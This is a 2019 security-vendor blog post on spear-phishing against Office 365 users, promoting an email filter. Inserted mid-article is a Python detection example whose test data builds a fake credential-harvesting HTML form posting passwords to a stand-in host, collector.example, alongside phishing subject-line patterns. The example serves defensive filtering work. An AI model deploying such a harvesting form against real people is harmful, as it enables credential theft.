
Phishing Attackers Targeting Microsoft Office 365 Email Users

Posted by Geraldine Hunt on Thu, Aug 8th, 2019

Any email administrator is aware of the dangers of phishing, but it's only when an organization is specifically targeted that it can get serious. Random phishing attacks are usually caught by email filters, but spear phishing attacks are much more sophisticated and use employee background data to avoid filters and provide a higher level of ROI for the attacker. An attacker can spend days (weeks even) collecting data on employees and use this information to email them directly. With the right attack technique, an attacker can walk away with gigabytes of intellectual data, customer and employee sensitive information, and important documents worth cash to your competitors.

Office 365 is a Treasure Trove for Attackers

Recently, attackers have focused directly on Office 365 users. Office 365 offers enterprise email using Microsoft Exchange servers, but administrators habitually use the same credentials across several facets of Office 365, including OneDrive, Skype, SharePoint, and Office Store. Internally, this doesn't pose an issue, but should an attacker gain access to a user's credentials through a spear-phishing campaign, the attacker would then have access to several other resources.

In a recent 2017 phishing attack, Office 365 users were targeted mainly for their email credentials. Attackers know that only a small percentage of users will fall for an unsolicited email from a stranger, but users trust people on their contact list implicitly. The campaign focused on stealing email credentials and then sending an email with a malicious HTML document attached. The attacker sent the malicious attachment to people on the victim's contact list. The email comes from a user that dozens of other users know, so the attacker has a better chance of stealing user credentials. This type of sophisticated attack is nothing new, but focusing on Office 365 users gives an attacker a better chance of accessing sensitive data.

To take the attack a step further, attackers used the victim's Skype credentials to log into a profile and send a malicious file to targets on the victim's contact list. Using this spear phishing method targeting Office 365 users, attackers were able to expand the attack from a few dozen targets to hundreds of people. It only takes a few good targets and an attacker can download any number of intellectual property documents, enterprise secrets, employee and customer financial data, and numerous other files that could pose a huge risk to the integrity of the organization.

Office 365 Phishing Campaign

The lures used in the widespread 2017 phishing attack included fraudulent notifications of low disk space and requests to review a document on DocuSign. In both of these attacks, the user is prompted for their Office 365 credentials. Subject lines include "FYI," "Approved Invoice," or "Fw: Payments." Once the user enters their Office 365 credentials, the attacker uses them to send additional phishing emails to business contacts on the user's account contact list.

Protect your business with the newest “zero-day” threat protection and intelligence against phishing, business email compromise and zero-day attacks with PhishTitan.


Zero-Day Attacks Pose the Greatest Risk

Many email filtering and security applications deal with known malware used in phishing attacks, but it's much more difficult to detect zero-day attacks. Zero-day attacks are campaigns and malware that haven't been seen in the wild yet. Antivirus software depends greatly on signature files of known attacks, but zero-day attacks have no known signature. With emails, it's even more difficult to avoid false positives while still defending the internal system from successful phishing attacks. False positives create hassles for the user and can affect productivity, but filtering email is the most efficient way of blocking these attacks from ever reaching the recipient's inbox.

The Exchange administrator needs a secure email solution that uses advanced algorithms that can predict zero-day attacks. This is a combination of checking attachments, analyzing content, anti-typosquatting, link protection, and encryption. All of these protections combined provide a comprehensive anti-phishing and anti-malware solution dedicated to email protection. Because Microsoft Exchange integrates with a Windows network environment, the solution must also work with Active Directory and LDAP.

Basic Email Filters are Not Enough

Phishing attacks continue to increase and adopt new tactics – and spam is increasing accordingly. In the second quarter of 2018, the amount of spam peaked in May at 51 percent; the average amount of spam in email traffic worldwide was 50 percent.

Old email filters checked for specific words in the title, a specific sender, or phrases found in the content to identify issues, but this method is no longer sufficient. Phishing attackers have an arsenal of techniques that bypass these traditional methods of spam and anti-malware software. Besides security awareness training, organizations using Office 365 must implement third-party, next-level email filters that analyze content and apply layers of filtering to determine whether an email or a link within an email could be malicious.
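The difference between a subject-keyword check and a content check, as an added example that is not SpamTitan's code or part of the original article: it scans HTML attachments for a password form that posts somewhere other than a trusted sign-in host. The sample messages, the `.example` domains and the trusted-host list are constructed assumptions.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Subject lines the article reports for the 2017 campaign.
CAMPAIGN_SUBJECTS = {"fyi", "approved invoice", "fw: payments"}
# Assumption: hosts where your users legitimately enter Office 365 credentials.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com"}

class FormScan(HTMLParser):
    """Record <form> action hosts and whether any password input exists."""
    def __init__(self):
        super().__init__()
        self.hosts, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.hosts.append(urlparse(a.get("action") or "").hostname)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def subject_filter(msg):
    """Old-style check: flag on subject keywords alone."""
    return (msg["Subject"] or "").strip().lower() in CAMPAIGN_SUBJECTS

def credential_form_findings(msg):
    """Content check: HTML parts asking for a password outside trusted hosts."""
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scan = FormScan()
        scan.feed(part.get_content())
        bad = [h for h in scan.hosts if h not in TRUSTED_LOGIN_HOSTS]
        if scan.has_password and (bad or not scan.hosts):
            findings.append((part.get_filename(), bad))
    return findings

def build(subject, html):
    """Constructed sample message with one HTML attachment (test data only)."""
    msg = EmailMessage()
    msg["From"], msg["Subject"] = "colleague@partner.example", subject
    msg.set_content("Please review the attached document.")
    msg.add_attachment(html, subtype="html", filename="document.html")
    return msg

BENIGN = build("FYI", "<html><body><p>Q3 agenda attached.</p></body></html>")
PHISH = build("FYI", '<form action="https://collector.example/p.php" method="post">'
              '<input type="email" name="u"><input type="password" name="p"></form>')
```

The subject check flags both messages, which is the false-positive problem described earlier, while the content check reports only the attachment that collects a password.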

With the SpamTitan Email Filter, you provide a dedicated mail gateway that fully protects your Exchange server and every recipient within the organization. SpamTitan provides phishing protection to prevent whaling and spear phishing by scanning all inbound email in real-time. SpamTitan searches for key indicators in the email header, domain information, and content. SpamTitan also performs reputation analysis on all links (including shortened URLs) contained in emails and blocks malicious emails before they are delivered to the end user.

How SpamTitan protects from phishing attempts:

  • URL reputation analysis during scanning against multiple reputations.
  • Detect and block malicious spear-phishing emails with either existing or new malware.
  • Heuristic rules to detect phishing based on message headers et al. These are updated frequently to address new threats.
  • Easy synchronization with Active Directory and LDAP.
  • Spam Confidence Levels can be applied by user, user-group and domain.
  • Whitelisting or blacklisting senders/IP addresses.
  • Infinitely scalable and universally compatible.

The combination of these features ensures SpamTitan protects Office 365 users and businesses from spear phishing, business email compromise (BEC), and cyber fraud. System administrators implementing Office 365 need to make sure it’s secure by layering in a dedicated secure messaging and spam filtering solution like SpamTitan to protect against advanced persistent threats. To protect against advanced threats, you need advanced protection.

Take a closer look at SpamTitan today – sign up for a free demo at a time that suits you.

More free Office 365 email security resources here:

1. SpamTitan for Office 365

2. Protecting Microsoft Office 365 from Cyber Attacks   

3. Phishing attackers targeting Office 365 Business Emails 

4. Filling the email security gap in Office 365 

5. The latest phishing and spoofing attack getting through microsoft office 365 

6. Improve the spam filter for Office 365 

7. Spamtitan Spam filtering with microsoft office 365
